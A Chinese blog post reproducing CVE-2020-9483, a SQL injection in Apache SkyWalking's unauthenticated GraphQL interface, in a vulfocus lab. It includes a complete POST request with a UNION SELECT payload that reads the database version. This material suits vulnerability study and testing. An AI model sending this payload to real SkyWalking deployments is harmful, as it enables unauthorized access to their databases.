Apache SkyWalking的Sql注入(cve-2020-9483)

最新推荐文章于 2023-10-13 15:02:19 发布
最新推荐文章于 2023-10-13 15:02:19 发布
阅读量1.4k 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Destiny_one/article/details/120508279
版权

简介

Apache SkyWalking 是一款应用性能监控(APM)工具,对微服务、云原生和容器化应用提供自动化、高性能的监控方案。项目于 2015 年创建,并于 2017 年 12 月进入 Apache 孵化器。
Apache SkyWalking 提供了分布式追踪,服务网格(Service Mesh)遥感数据分析,指标聚合和可视化等多种能力。项目覆盖范围,从一个单纯的分布式追踪系统,扩展为一个可观测性分析平台(observability analysis platform)和应用性能监控管理系统。

漏洞描述

SkyWalking使用H2、MySQL或者TiDB作为存储方案时,攻击者可通过默认未授权的GraphQL接口构造恶意请求,从而进行SQL注入。

影响版本

Apache SkyWalking 6.0.0 - 6.6.0, 7.0.0

测试环境

本次环境使用的是vulfocus拉起的docker环境进行漏洞复现

漏洞复现

进入环境后访问/graphql,构造POST数据包
POST /graphql HTTP/1.1
Host:192.168.8.230:56464
Content-Type: application/json;charset=utf-8
Content-Length: 315
Connection: close

{“query”:“query queryData($duration: Duration!) {globalP99: getLinearIntValues(metric: {name: “all_p99”, id: “’) UNION ALL SELECT NULL,CONCAT(’~’, H2VERSION(), ‘~’)–” }, duration: $duration) { values { value } }}”,“variables”:{“duration”:{“start”:“2020-08-07 1417”,“end”:“2020-08-07 1418”,“step”:“MINUTE”}}}
在这里插入图片描述

可以看到我们已经获得数据库的版本了

鸣蜩十四
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache-Skywalking-SQL注入复现+利用(CVE-2020-9483)
0xSec
03-12 1331
Apache SkyWalking使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参数。
Apache SkyWalking SQL注入(CVE-2020-9483)
jammny
02-01 881
漏洞详情 当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参数。 影响版本 Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0 漏洞分析 漏洞利用 访问/graphql进行抓包,POST提交如下poc:
[Vulfocus解题系列]skywalking SQL注入CVE-2020-9483
00勇士王子的博客
01-12 3739
描述 Apache SkyWalking是美国阿帕奇软件(Apache Software)基金会的一款主要用于微服务、云原生和基于容器等环境的应用程序性能监视器。 当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 复现过程 注:本次复现使用在线靶场http://vulfocus.fofa.so 打开环境 加上路径抓包 /graphql 改成post,加上payload,利用报错注入
Apache SkyWalking SQL注入漏洞(CVE-2020-9483)复现
锋刃科技的博客
03-05 2257
简介 Apache Skywalking是一款针对分布式系统的应用程序性能监视工具,为微服务,云原生和基于容器(Docker,Kubernetes,Mesos)的体系结构而设计。 影响版本 Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0 环境搭建 这里下载6.5.0进行搭建 下载地址 https://archive.apache.org/dist/skywalking/6.5.0/apache-skywalking-apm-6.5.0.ta...
skywalking建表SQL
11-12
skywalking启用mysql时的建表SQL,配置好mysql后,如果提示找不到表,可以使用此SQL来建表。
Apache Skywalking =8.3 SQL注入分析复现
黑白的博客
05-11 841
声明 好好学习,天天向上 漏洞描述 Apache SkyWalking 是一款应用性能监控(APM)工具,对微服务、云原生和容器化应用提供自动化、高性能的监控方案。项目于 2015 年创建,并于 2017 年 12 月进入 Apache 孵化器。 Apache SkyWalking 提供了分布式追踪,服务网格(Service Mesh)遥感数据分析,指标聚合和可视化等多种能力。项目覆盖范围,从一个单纯的分布式追踪系统,扩展为一个可观测性分析平台(observability analysis platform
apache-skywalking-java-agent-8.9.0
05-21
在这个"apache-skywalking-java-agent-8.9.0"版本中,我们将探讨这个Java代理如何监控JVM服务,并深入理解其相关知识点。 1. **SkyWalking Java Agent**:SkyWalking的Java代理是一个自动探针,可以无侵入地附加到...
apache-skywalking-apm-es7-8.7.0.tar.gz
03-20
此压缩包 "apache-skywalking-apm-es7-8.7.0.tar.gz" 包含了针对 Elasticsearch 7.x 版本的 SkyWalking 平台的安装文件,版本为 8.7.0。Apache 标签表明了这是 Apache 软件基金会的一个项目。 SkyWalking 的核心...
apache-skywalking-apm-8.5.0.tar.gz
01-03
这个压缩包 "apache-skywalking-apm-8.5.0.tar.gz" 包含了 Apache SkyWalking 8.5.0 版本的安装文件,用于在您的系统上部署和运行该监控平台。 SkyWalking 是一个强大的分布式追踪系统,能够帮助开发者对复杂分布式...
apache-skywalking-apm-es7-8.5.0.tar.gz
03-20
apache-skywalking-apm-es7-8.5.0.tar.gz
SpringCloud简单项目,附带建表sql(生产者消费者注册中心搭建成功,项目可以成功启动)
04-10
简单搭建的springCloud项目,单节点服务,非集群搭建。springBoot版本为1.5.20,附带数据库脚本。自测可以成功访问。
最新版 apache-skywalking-apm-es7-8.2.0.tar.gz
11-13
此最新版本 "apache-skywalking-apm-es7-8.2.0.tar.gz" 包含了针对 Elasticsearch 7.x 的优化和支持,这意味着它能够与 Elasticsearch 7.x 版本紧密集成,提供高效且强大的日志分析和监控功能。 SkyWalking 的核心...
注入预防 预编译_Apache SkyWalking SQL注入漏洞复现分析 (CVE-2020-9483) - luzhouxiaoshuai...
weixin_39835117的博客
12-09 197
转载自:https:///article/10971、前言Apache SkyWalking 是一款开源的应用性能监控系统,包括指标监控,分布式追踪,分布式系统性能诊断等。近日,百度云安全团队监测到国内某厂商发布了Apache SkyWalking SQL注入漏洞的风险通告,漏洞编号为CVE-2020-9483。当SkyWalking使用H2、MySQL或者TiDB作为存储方案时,攻击者可通过默认...
紧急通告:Apache SkyWalking SQL(CVE-2020-13921)风险通告
m0_48520508的博客
08-08 471
0x01漏洞描述 近日,腾讯安全团队向Apache SkyWalking官方团队提交SQL注入漏洞,攻击者可利用漏洞获取服务器的敏感信息,目前官方已发布新版本修复该漏洞。 东塔安全学院建议相关单位及时开展安全自查,如在受影响范围,请您及时进行更新修复,避免被外部攻击者入侵。 0x02漏洞详情 在SkyWalking多个版本中,默认开放的未授权GraphQL接口,通过该接口,攻击者可以构造恶意的请求包进行SQL注入,从而导致用户数据库敏感信息泄露。鉴于该漏洞影响较大,建议企业尽快修复。 Apache Sky.
[CVE-2020-9483/13921]Apache SkyWalking SQL注入
公众号shadow sock7
08-07 2814
参考: https://www.weibo.com/ttarticle/p/show?id=2309404520814409023617 编译好的6.5.0版本: wget https://archive.apache.org/dist/skywalking/6.5.0/apache-skywalking-apm-6.5.0.tar.gz cd apache-skywalking-apm-bin/bin vi oapService.sh 加上调试参数: DEBUG_OPTIONS="-agentlib
CVE-2020-9483 apache skywalking SQL注入漏洞
最新发布
mirocky的博客
10-13 1298
当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参数。
建表 sql
乌托邦的专栏
03-02 726
创建表create table table_name  ( column_name_1    data_type_1,   column_name_2    data_type_2,  ... )## 数据类型中:数字数据类型: number ( P, S ) P:精度,除0之外的数字的数量,范围是1-38S:范围,小数点右边数字的数量1234.56 (6,
spring cloud: skywalking 8.7(MySQL)搭建
amadeus_liu2的博客
07-26 774
cloud
skyWalking自动建表-逻辑梳理
vampire_Violet的博客
04-13 744
使用skyWalking后,发现我们不需要创建表,启动skywalking会自动创建表,遂研究官方源码,感觉oap-server设计的自动建表功能很强大,并进行逻辑梳理,仅供参考。源码地址:https://github.com/apache/skywalking.git。
apache-skywalking-apm-es7-8.0.0.tar.gz下载
08-18
要下载apache-skywalking-apm-es7-8.0.0.tar.gz,你可以按照以下步骤进行操作: 第一步,打开你的网络浏览器,进入Apache SkyWalking的官方网站。 第二步,在网站上搜索或导航到下载页面。你可以在网站的顶部或...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值